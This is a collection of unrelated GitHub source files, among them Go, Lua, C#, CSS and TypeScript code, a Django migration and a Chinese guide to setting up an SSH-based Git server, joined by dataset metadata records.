equal(rpad('foo', 8, '0'), 'foo00000');
equal(rpad('foo', 7, '0'), 'foo0000');
equal(rpad('', 2), ' ');
equal(rpad(null, 2), ' ');
equal(rpad(undefined, 2), ' ');
});
| {
"pile_set_name": "Github"
} |
$1 Door.blod < input
rm -rf build
| {
"pile_set_name": "Github"
} |
/*
Copyright 2017 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package meta
import (
"sync"
"k8s.io/apimachinery/pkg/runtime/schema"
)
// lazyObject defers loading the mapper and typer until necessary.
type lazyObject struct {
loader func() (RESTMapper, error)
lock sync.Mutex
loaded bool
err error
mapper RESTMapper
}
// NewLazyObjectLoader handles unrecoverable errors when creating a RESTMapper / ObjectTyper by
// returning those initialization errors when the interface methods are invoked. This defers the
// initialization and any server calls until a client actually needs to perform the action.
func NewLazyRESTMapperLoader(fn func() (RESTMapper, error)) RESTMapper {
obj := &lazyObject{loader: fn}
return obj
}
// init lazily loads the mapper and typer, returning an error if initialization has failed.
func (o *lazyObject) init() error {
o.lock.Lock()
defer o.lock.Unlock()
if o.loaded {
return o.err
}
o.mapper, o.err = o.loader()
o.loaded = true
return o.err
}
var _ RESTMapper = &lazyObject{}
func (o *lazyObject) KindFor(resource schema.GroupVersionResource) (schema.GroupVersionKind, error) {
if err := o.init(); err != nil {
return schema.GroupVersionKind{}, err
}
return o.mapper.KindFor(resource)
}
func (o *lazyObject) KindsFor(resource schema.GroupVersionResource) ([]schema.GroupVersionKind, error) {
if err := o.init(); err != nil {
return []schema.GroupVersionKind{}, err
}
return o.mapper.KindsFor(resource)
}
func (o *lazyObject) ResourceFor(input schema.GroupVersionResource) (schema.GroupVersionResource, error) {
if err := o.init(); err != nil {
return schema.GroupVersionResource{}, err
}
return o.mapper.ResourceFor(input)
}
func (o *lazyObject) ResourcesFor(input schema.GroupVersionResource) ([]schema.GroupVersionResource, error) {
if err := o.init(); err != nil {
return []schema.GroupVersionResource{}, err
}
return o.mapper.ResourcesFor(input)
}
func (o *lazyObject) RESTMapping(gk schema.GroupKind, versions ...string) (*RESTMapping, error) {
if err := o.init(); err != nil {
return nil, err
}
return o.mapper.RESTMapping(gk, versions...)
}
func (o *lazyObject) RESTMappings(gk schema.GroupKind, versions ...string) ([]*RESTMapping, error) {
if err := o.init(); err != nil {
return nil, err
}
return o.mapper.RESTMappings(gk, versions...)
}
func (o *lazyObject) ResourceSingularizer(resource string) (singular string, err error) {
if err := o.init(); err != nil {
return "", err
}
return o.mapper.ResourceSingularizer(resource)
}
| {
"pile_set_name": "Github"
} |
/* iCheck plugin flat skin, black
----------------------------------- */
.icheckbox_flat,
.iradio_flat {
display: inline-block;
*display: inline;
vertical-align: middle;
margin: 0;
padding: 0;
width: 20px;
height: 20px;
background: url(flat.png) no-repeat;
border: none;
cursor: pointer;
}
.icheckbox_flat {
background-position: 0 0;
}
.icheckbox_flat.checked {
background-position: -22px 0;
}
.icheckbox_flat.disabled {
background-position: -44px 0;
cursor: default;
}
.icheckbox_flat.checked.disabled {
background-position: -66px 0;
}
.iradio_flat {
background-position: -88px 0;
}
.iradio_flat.checked {
background-position: -110px 0;
}
.iradio_flat.disabled {
background-position: -132px 0;
cursor: default;
}
.iradio_flat.checked.disabled {
background-position: -154px 0;
}
/* Retina support */
@media only screen and (-webkit-min-device-pixel-ratio: 1.5),
only screen and (-moz-min-device-pixel-ratio: 1.5),
only screen and (-o-min-device-pixel-ratio: 3/2),
only screen and (min-device-pixel-ratio: 1.5) {
.icheckbox_flat,
.iradio_flat {
background-image: url([email protected]);
-webkit-background-size: 176px 22px;
background-size: 176px 22px;
}
} | {
"pile_set_name": "Github"
} |
class Object
# Get object's meta (ghost, eigenclass, singleton) class
def metaclass
class << self
self
end
end
# If class_eval is called on an object, add those methods to its metaclass
def class_eval(*args, &block)
metaclass.class_eval(*args, &block)
end
end
| {
"pile_set_name": "Github"
} |
local skynet = require "skynet"
local gateserver = require "snax.gateserver"
local watchdog
local connection = {} -- fd -> connection : { fd , client, agent , ip, mode }
local forwarding = {} -- agent -> connection
skynet.register_protocol {
name = "client",
id = skynet.PTYPE_CLIENT,
}
local handler = {}
function handler.open(source, conf)
watchdog = conf.watchdog or source
end
function handler.message(fd, msg, sz)
-- recv a package, forward it
local c = connection[fd]
local agent = c.agent
if agent then
-- It's safe to redirect msg directly , gateserver framework will not free msg.
skynet.redirect(agent, c.client, "client", fd, msg, sz)
else
skynet.send(watchdog, "lua", "socket", "data", fd, skynet.tostring(msg, sz))
-- skynet.tostring will copy msg to a string, so we must free msg here.
skynet.trash(msg,sz)
end
end
function handler.connect(fd, addr)
local c = {
fd = fd,
ip = addr,
}
connection[fd] = c
skynet.send(watchdog, "lua", "socket", "open", fd, addr)
end
local function unforward(c)
if c.agent then
forwarding[c.agent] = nil
c.agent = nil
c.client = nil
end
end
local function close_fd(fd)
local c = connection[fd]
if c then
unforward(c)
connection[fd] = nil
end
end
function handler.disconnect(fd)
close_fd(fd)
skynet.send(watchdog, "lua", "socket", "close", fd)
end
function handler.error(fd, msg)
close_fd(fd)
skynet.send(watchdog, "lua", "socket", "error", fd, msg)
end
function handler.warning(fd, size)
skynet.send(watchdog, "lua", "socket", "warning", fd, size)
end
local CMD = {}
function CMD.forward(source, fd, client, address)
local c = assert(connection[fd])
unforward(c)
c.client = client or 0
c.agent = address or source
forwarding[c.agent] = c
gateserver.openclient(fd)
end
function CMD.accept(source, fd)
local c = assert(connection[fd])
unforward(c)
gateserver.openclient(fd)
end
function CMD.kick(source, fd)
gateserver.closeclient(fd)
end
function handler.command(cmd, source, ...)
local f = assert(CMD[cmd])
return f(source, ...)
end
gateserver.start(handler)
| {
"pile_set_name": "Github"
} |
package common
const EdwardVersion = "1.9.1"
| {
"pile_set_name": "Github"
} |
export { default as export0 } from "./lib";
export { default as export1 } from "./lib.dom";
export { default as export2 } from "./lib.dom.iterable";
export { default as export3 } from "./lib.es2015.collection";
export { default as export4 } from "./lib.es2015.core";
export { default as export5 } from "./lib.es2015";
export { default as export6 } from "./lib.es2015.generator";
export { default as export7 } from "./lib.es2015.iterable";
export { default as export8 } from "./lib.es2015.promise";
export { default as export9 } from "./lib.es2015.proxy";
export { default as export10 } from "./lib.es2015.reflect";
export { default as export11 } from "./lib.es2015.symbol";
export { default as export12 } from "./lib.es2015.symbol.wellknown";
export { default as export13 } from "./lib.es2016.array.include";
export { default as export14 } from "./lib.es2016";
export { default as export15 } from "./lib.es2016.full";
export { default as export16 } from "./lib.es2017";
export { default as export17 } from "./lib.es2017.full";
export { default as export18 } from "./lib.es2017.intl";
export { default as export19 } from "./lib.es2017.object";
export { default as export20 } from "./lib.es2017.sharedmemory";
export { default as export21 } from "./lib.es2017.string";
export { default as export22 } from "./lib.es2017.typedarrays";
export { default as export23 } from "./lib.es2018.asyncgenerator";
export { default as export24 } from "./lib.es2018.asynciterable";
export { default as export25 } from "./lib.es2018";
export { default as export26 } from "./lib.es2018.full";
export { default as export27 } from "./lib.es2018.intl";
export { default as export28 } from "./lib.es2018.promise";
export { default as export29 } from "./lib.es2018.regexp";
export { default as export30 } from "./lib.es2019.array";
export { default as export31 } from "./lib.es2019";
export { default as export32 } from "./lib.es2019.full";
export { default as export33 } from "./lib.es2019.object";
export { default as export34 } from "./lib.es2019.string";
export { default as export35 } from "./lib.es2019.symbol";
export { default as export36 } from "./lib.es2020.bigint";
export { default as export37 } from "./lib.es2020";
export { default as export38 } from "./lib.es2020.full";
export { default as export39 } from "./lib.es2020.intl";
export { default as export40 } from "./lib.es2020.promise";
export { default as export41 } from "./lib.es2020.string";
export { default as export42 } from "./lib.es2020.symbol.wellknown";
export { default as export43 } from "./lib.es5";
export { default as export44 } from "./lib.es6";
export { default as export45 } from "./lib.esnext";
export { default as export46 } from "./lib.esnext.full";
export { default as export47 } from "./lib.esnext.intl";
export { default as export48 } from "./lib.esnext.promise";
export { default as export49 } from "./lib.esnext.string";
export { default as export50 } from "./lib.scripthost";
export { default as export51 } from "./lib.webworker";
export { default as export52 } from "./lib.webworker.importscripts";
| {
"pile_set_name": "Github"
} |
package org.wildfly.swarm.examples.microprofile.opentracing;
import javax.enterprise.context.ApplicationScoped;
import org.eclipse.microprofile.opentracing.Traced;
/**
* @author Pavol Loffay
*/
@Traced
@ApplicationScoped
public class ServiceBean {
public String method() {
return ServiceBean.class.getSimpleName() + ".method";
}
}
| {
"pile_set_name": "Github"
} |
# 架设服务器
现在我们过一边服务器端架设 SSH 访问的流程。本例将使用 `authorized_keys` 方法来给用户授权。我们还将假定使用类似 Ubuntu 这样的标准 Linux 发行版。首先,创建一个名为 'git' 的用户,并为其创建一个 `.ssh` 目录。
$ sudo adduser git
$ su git
$ cd
$ mkdir .ssh
接下来,把开发者的 SSH 公钥添加到这个用户的 `authorized_keys` 文件中。假设你通过电邮收到了几个公钥并存到了临时文件里。重复一下,公钥大致看起来是这个样子:
$ cat /tmp/id_rsa.john.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCB007n/ww+ouN4gSLKssMxXnBOvf9LGt4L
ojG6rs6hPB09j9R/T17/x4lhJA0F3FR1rP6kYBRsWj2aThGw6HXLm9/5zytK6Ztg3RPKK+4k
Yjh6541NYsnEAZuXz0jTTyAUfrtU3Z5E003C4oxOj6H0rfIF1kKI9MAQLMdpGW1GYEIgS9Ez
Sdfd8AcCIicTDWbqLAcU4UpkaX8KyGlLwsNuuGztobF8m72ALC/nLF6JLtPofwFBlgc+myiv
O7TCUSBdLQlgMVOFq1I2uPWQOkOWQAHukEOmfjy2jctxSDBQ220ymjaNsHT4kgtZg2AYYgPq
dAv8JggJICUvax2T9va5 gsg-keypair
只要把它们逐个追加到 `authorized_keys` 文件尾部即可:
$ cat /tmp/id_rsa.john.pub >> ~/.ssh/authorized_keys
$ cat /tmp/id_rsa.josie.pub >> ~/.ssh/authorized_keys
$ cat /tmp/id_rsa.jessica.pub >> ~/.ssh/authorized_keys
现在可以用 `--bare` 选项运行 `git init` 来建立一个裸仓库,这会初始化一个不包含工作目录的仓库。
$ cd /opt/git
$ mkdir project.git
$ cd project.git
$ git --bare init
这时,Join,Josie 或者 Jessica 就可以把它加为远程仓库,推送一个分支,从而把第一个版本的项目文件上传到仓库里了。值得注意的是,每次添加一个新项目都需要通过 shell 登入主机并创建一个裸仓库目录。我们不妨以 `gitserver` 作为 `git` 用户及项目仓库所在的主机名。如果在网络内部运行该主机,并在 DNS 中设定 `gitserver` 指向该主机,那么以下这些命令都是可用的:
# 在 John 的电脑上
$ cd myproject
$ git init
$ git add .
$ git commit -m 'initial commit'
$ git remote add origin git@gitserver:/opt/git/project.git
$ git push origin master
这样,其他人的克隆和推送也一样变得很简单:
$ git clone git@gitserver:/opt/git/project.git
$ cd project
$ vim README
$ git commit -am 'fix for the README file'
$ git push origin master
用这个方法可以很快捷地为少数几个开发者架设一个可读写的 Git 服务。
作为一个额外的防范措施,你可以用 Git 自带的 `git-shell` 工具限制 `git` 用户的活动范围。只要把它设为 `git` 用户登入的 shell,那么该用户就无法使用普通的 bash 或者 csh 什么的 shell 程序。编辑 `/etc/passwd` 文件:
$ sudo vim /etc/passwd
在文件末尾,你应该能找到类似这样的行:
git:x:1000:1000::/home/git:/bin/sh
把 `bin/sh` 改为 `/usr/bin/git-shell` (或者用 `which git-shell` 查看它的实际安装路径)。该行修改后的样子如下:
git:x:1000:1000::/home/git:/usr/bin/git-shell
现在 `git` 用户只能用 SSH 连接来推送和获取 Git 仓库,而不能直接使用主机 shell。尝试普通 SSH 登录的话,会看到下面这样的拒绝信息:
$ ssh git@gitserver
fatal: What do you think I am? A shell?
Connection to gitserver closed.
| {
"pile_set_name": "Github"
} |
CSEXPORT void CSCONV Export_FInputAxisBinding_Get_AxisName(FInputAxisBinding* instance, FName& result)
{
result = instance->AxisName;
}
CSEXPORT void CSCONV Export_FInputAxisBinding_Set_AxisName(FInputAxisBinding* instance, const FName& value)
{
instance->AxisName = value;
}
CSEXPORT FInputAxisUnifiedDelegate& CSCONV Export_FInputAxisBinding_Get_AxisDelegate(FInputAxisBinding* instance)
{
return instance->AxisDelegate;
}
CSEXPORT float CSCONV Export_FInputAxisBinding_Get_AxisValue(FInputAxisBinding* instance)
{
return instance->AxisValue;
}
CSEXPORT void CSCONV Export_FInputAxisBinding_Set_AxisValue(FInputAxisBinding* instance, float value)
{
instance->AxisValue = value;
}
CSEXPORT void CSCONV Export_FInputAxisBinding(RegisterFunc registerFunc)
{
REGISTER_FUNC(Export_FInputAxisBinding_Get_AxisName);
REGISTER_FUNC(Export_FInputAxisBinding_Set_AxisName);
REGISTER_FUNC(Export_FInputAxisBinding_Get_AxisDelegate);
REGISTER_FUNC(Export_FInputAxisBinding_Get_AxisValue);
REGISTER_FUNC(Export_FInputAxisBinding_Set_AxisValue);
} | {
"pile_set_name": "Github"
} |
/* Simple_def.h
*
* Copyright (C) 1992-2012,2015,2017 Paul Boersma
*
* This code is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or (at
* your option) any later version.
*
* This code is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
* See the GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this work. If not, see <http://www.gnu.org/licenses/>.
*/
#define ooSTRUCT SimpleInteger
oo_DEFINE_CLASS (SimpleInteger, Daata)
oo_INTEGER (number)
oo_END_CLASS (SimpleInteger)
#undef ooSTRUCT
#define ooSTRUCT SimpleDouble
oo_DEFINE_CLASS (SimpleDouble, Daata)
oo_DOUBLE (number)
oo_END_CLASS (SimpleDouble)
#undef ooSTRUCT
#define ooSTRUCT SimpleString
oo_DEFINE_CLASS (SimpleString, Daata)
oo_STRING (string)
oo_END_CLASS (SimpleString)
#undef ooSTRUCT
/* End of file Simple_def.h */
| {
"pile_set_name": "Github"
} |
package types
// KubernetesDistro represents a Kubernetes distribution.
type KubernetesDistro int
// EtcdResponse represents the response of an etcd2 server at /version
// endpoint. Example:
//
// {
// "etcdserver": "2.3.8",
// "etcdcluster": "2.3.0"
// }
type EtcdResponse struct {
EtcdServerVersion string `json:"etcdserver"`
EtcdClusterVersion string `json:"etcdcluster"`
}
// Reap function types take a path and a value and perform
// some action on it, for example, storing it to disk or
// writing it to stdout. The arg parameter is optional
// and can be used by the function in a context-dependent way,
// for example, it can specify a directory to write to.
type Reap func(path, value string, arg interface{}) error
| {
"pile_set_name": "Github"
} |
using Sandbox.Common.ObjectBuilders;
using Sandbox.Engine.Utils;
using Sandbox.Game.Entities;
using Sandbox.Game.Multiplayer;
using Sandbox.Game.World;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using VRage.ObjectBuilders;
using VRageMath;
using VRageRender;
namespace Sandbox.Game.AI
{
[MyAutopilotType(typeof(MyObjectBuilder_SimpleAutopilot))]
class MySimpleAutopilot : MyAutopilotBase
{
private static readonly int SHIP_LIFESPAN_MILLISECONDS = 30 * 60 * 1000; //30 minutes
private Vector3D m_destination;
private Vector3 m_direction;
private int m_spawnTime;
public MySimpleAutopilot() : this(Vector3.Zero, Vector3.One) { }
public MySimpleAutopilot(Vector3D destination, Vector3 direction)
{
m_destination = destination;
m_direction = direction;
m_spawnTime = MySandboxGame.TotalGamePlayTimeInMilliseconds;
}
public override MyObjectBuilder_AutopilotBase GetObjectBuilder()
{
MyObjectBuilder_SimpleAutopilot ob = MyObjectBuilderSerializer.CreateNewObject<MyObjectBuilder_SimpleAutopilot>();
ob.Destination = m_destination;
ob.Direction = m_direction;
return ob;
}
public override void Init(MyObjectBuilder_AutopilotBase objectBuilder)
{
MyObjectBuilder_SimpleAutopilot ob = (MyObjectBuilder_SimpleAutopilot)objectBuilder;
m_destination = ob.Destination;
m_direction = ob.Direction;
m_spawnTime = MySandboxGame.TotalGamePlayTimeInMilliseconds;
}
protected override void OnShipControllerChanged()
{ }
public override void Update()
{
if (ShipController == null) return;
int lifeTime = MySandboxGame.TotalGamePlayTimeInMilliseconds - m_spawnTime;
if (lifeTime > SHIP_LIFESPAN_MILLISECONDS)
{
if (!IsPlayerNearby())
{
var shipGroup = MyCubeGridGroups.Static.Logical.GetGroup(ShipController.CubeGrid);
foreach (var node in shipGroup.Nodes)
{
node.NodeData.SyncObject.SendCloseRequest();
}
}
}
if ((ShipController.PositionComp.GetPosition() - m_destination).Dot(m_direction) > 0.0f)
{
if (!IsPlayerNearby())
{
var shipGroup = MyCubeGridGroups.Static.Logical.GetGroup(ShipController.CubeGrid);
foreach (var node in shipGroup.Nodes)
{
node.NodeData.SyncObject.SendCloseRequest();
}
}
}
}
private bool IsPlayerNearby()
{
BoundingBox playerBox = new BoundingBox(Vector3.MaxValue, Vector3.MinValue);
MyEntities.GetInflatedPlayerBoundingBox(ref playerBox, MyNeutralShipSpawner.NEUTRAL_SHIP_FORBIDDEN_RADIUS);
if (playerBox.Contains(ShipController.PositionComp.GetPosition()) == ContainmentType.Contains)
return true;
return false;
}
public override void DebugDraw()
{
if (!MyDebugDrawSettings.DEBUG_DRAW_NEUTRAL_SHIPS || ShipController == null) return;
Vector3D cameraPos = MySector.MainCamera.Position;
Vector3D origin = Vector3D.Normalize(ShipController.PositionComp.GetPosition() - cameraPos);
Vector3D destination = Vector3D.Normalize(m_destination - cameraPos);
Vector3D halfPoint = Vector3D.Normalize((origin + destination) * 0.5f) + cameraPos; // Prevent going through the camera
origin += cameraPos;
destination += cameraPos;
Vector3D currentPoint = Vector3D.Normalize(ShipController.WorldMatrix.Translation - cameraPos) + cameraPos;
MyRenderProxy.DebugDrawLine3D(origin, halfPoint, Color.Red, Color.Red, false);
MyRenderProxy.DebugDrawLine3D(halfPoint, destination, Color.Red, Color.Red, false);
MyRenderProxy.DebugDrawSphere(currentPoint, 0.01f, Color.Orange.ToVector3(), 1.0f, false);
MyRenderProxy.DebugDrawSphere(currentPoint + m_direction * 0.015f, 0.005f, Color.Yellow.ToVector3(), 1.0f, false);
MyRenderProxy.DebugDrawText3D(origin, "Remaining time: " + (SHIP_LIFESPAN_MILLISECONDS-MySandboxGame.TotalGamePlayTimeInMilliseconds + m_spawnTime), Color.Red, 1, false);
}
}
}
| {
"pile_set_name": "Github"
} |
/*
* Copyright 2012-2020 Aerospike, Inc.
*
* Portions may be licensed to Aerospike, Inc. under one or more contributor
* license agreements WHICH ARE COMPATIBLE WITH THE APACHE LICENSE, VERSION 2.0.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*/
package com.aerospike.test.sync.basic;
import static org.junit.Assert.fail;
import org.junit.Test;
import com.aerospike.client.Bin;
import com.aerospike.client.Key;
import com.aerospike.client.Record;
import com.aerospike.test.sync.TestSync;
public class TestPutGet extends TestSync {
@Test
public void putGet() {
if (args.singleBin) {
Key key = new Key(args.namespace, args.set, "putgetkey");
Bin bin = new Bin("", "value");
client.put(null, key, bin);
Record record = client.get(null, key);
assertBinEqual(key, record, bin);
}
else {
Key key = new Key(args.namespace, args.set, "putgetkey");
Bin bin1 = new Bin("bin1", "value1");
Bin bin2 = new Bin("bin2", "value2");
client.put(null, key, bin1, bin2);
Record record = client.get(null, key);
assertBinEqual(key, record, bin1);
assertBinEqual(key, record, bin2);
}
}
@Test
public void getHeader() {
Key key = new Key(args.namespace, args.set, "putgetkey");
Record record = client.getHeader(null, key);
assertRecordFound(key, record);
// Generation should be greater than zero. Make sure it's populated.
if (record.generation == 0) {
fail("Invalid record header: generation=" + record.generation + " expiration=" + record.expiration);
}
}
}
| {
"pile_set_name": "Github"
} |
.sapMSD .sapMDialogStretchContent {
padding: 0px;
&.sapMDialogScrollCont {
height: 100%;
}
}
.sapMSD .sapMSDFirstActionGroup {
border-top: 1px solid @sapUiListBorderColor;
box-sizing: border-box;
}
.sapMSD .sapMTB.sapMSDPageHeader {
padding: 0px;
}
| {
"pile_set_name": "Github"
} |
--
-- This file and its contents are supplied under the terms of the
-- Common Development and Distribution License ("CDDL"), version 1.0.
-- You may only use this file in accordance with the terms of version
-- 1.0 of the CDDL.
--
-- A full copy of the text of the CDDL should have accompanied this
-- source. A copy of the CDDL is also available via the Internet at
-- http://www.illumos.org/license/CDDL.
--
--
-- Copyright (c) 2016, 2017 by Delphix. All rights reserved.
--
args = ...
argv = args["argv"]
fs1 = argv[1]
fs2 = argv[2]
longstring = "a"
for i=1,9 do
longstring = longstring .. longstring
end
-- invalid snapshot names
assert(zfs.sync.snapshot("ceci_nest_pas_une_dataset") == EINVAL);
assert(zfs.sync.snapshot(fs1) == EINVAL)
assert(zfs.sync.snapshot(fs1 .. "@" .. longstring) == ENAMETOOLONG)
assert(zfs.sync.snapshot(fs2 .. "@snap1") == 0)
-- only one snapshot of a filesystem is allowed per TXG.
assert(zfs.sync.snapshot(fs2 .. "@snap2") == EAGAIN)
-- snapshot already exists
assert(zfs.sync.snapshot(fs1 .. "@snap1") == EEXIST)
| {
"pile_set_name": "Github"
} |
// Copyright 2014 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// +build !gccgo
#include "textflag.h"
//
// System calls for amd64, Solaris are implemented in runtime/syscall_solaris.go
//
TEXT ·sysvicall6(SB),NOSPLIT,$0-88
JMP syscall·sysvicall6(SB)
TEXT ·rawSysvicall6(SB),NOSPLIT,$0-88
JMP syscall·rawSysvicall6(SB)
| {
"pile_set_name": "Github"
} |
# Generated by Django 2.2.11 on 2020-04-12 05:00
from django.db import migrations
def auto_verify_users_with_facility(apps, *args):
user_model = apps.get_model('users', 'User')
# all users who has at-least one facility associated with them is verified
for user in user_model.objects.all():
user.verified = user.facility_set.exists()
user.save()
# all users who are equal or above District Lab Admin (25)
user_model.objects.filter(user_type__gte=25).update(verified=True)
def reverse_auto_verify_users_with_facility(*args):
pass
class Migration(migrations.Migration):
dependencies = [
('users', '0021_make_kerala_everyones_state'),
]
operations = [
migrations.RunPython(
auto_verify_users_with_facility,
reverse_code=reverse_auto_verify_users_with_facility
)
]
| {
"pile_set_name": "Github"
} |
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.waveprotocol.wave.model.testing;
import junit.framework.TestCase;
/**
* Generic base implementation for a test case that tests the behaviour of a
* single type. This implementation holds a reference to a factory for
* creating instances of that interface, and uses that factory to instantiates
* the instance to test in {@link #setUp()}.
*
* @param <T> interface type being tested
*/
public abstract class GenericTestBase<T> extends TestCase {
/** Factory used to create each wave to be tested. */
protected final Factory<? extends T> factory;
// State initialized in setUp()
/** Target to test. */
protected T target;
/**
* Creates this test case, which runs on the wave-datas created by a factory.
*
* @param factory factory for creating the wave-datas to test
*/
protected GenericTestBase(Factory<? extends T> factory) {
this.factory = factory;
}
/**
* {@inheritDoc}
*
* This implementation uses the test's factory to creates a test target.
*/
@Override
protected void setUp() {
target = factory.create();
}
/**
* {@inheritDoc}
*/
@Override
protected void tearDown() throws Exception {
// This is only overridden to expose tearDown to GWTTestBase (which should
// be in GWTTestBase's scope anyway, since it extends TestCase, but for
// some reason it isn't).
super.tearDown();
}
}
| {
"pile_set_name": "Github"
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.